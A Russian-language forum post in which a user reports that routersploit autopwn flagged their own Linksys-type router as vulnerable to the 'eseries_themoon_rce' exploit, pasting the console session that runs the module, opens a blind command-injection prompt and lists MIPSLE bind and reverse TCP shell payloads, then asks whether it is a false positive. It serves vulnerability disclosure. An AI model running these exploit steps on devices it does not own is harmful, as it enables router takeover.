Jump to content

routersploit: eseries_themoon_rce


Legoos
 Share

Recommended Posts

Добрый день. Ради интереса просканировал свой роутер из локальной сети с помощью routersploit autopwn и обнаружилась уязвимость 

[+] 192.168.1.130 Device is vulnerable:

   Target            Port     Service     Exploit
   ------            ----     -------     -------
   192.168.1.130     80       http        exploits/routers/linksys/eseries_themoon_rce

Пошёл дальше

rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.130
[+] target => 192.168.1.130
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module exploits/routers/linksys/eseries_themoon_rce...
[+] Target is vulnerable
[*] Invoking command loop...
[*] It is blind command injection - response is not available

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > show payloads
[*] Available payloads:

   Payload                Name                   Description
   -------                ----                   -----------
   mipsle/bind_tcp        MIPSLE Bind TCP        Creates interactive tcp bind shell for MIPSLE architecture.
   mipsle/reverse_tcp     MIPSLE Reverse TCP     Creates interactive tcp reverse shell for MIPSLE architecture.

Может ложно сработало на похожую уязвимость у Linksys, я не разбираюсь в этом особо. Просьба проверить, на всякий случай.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...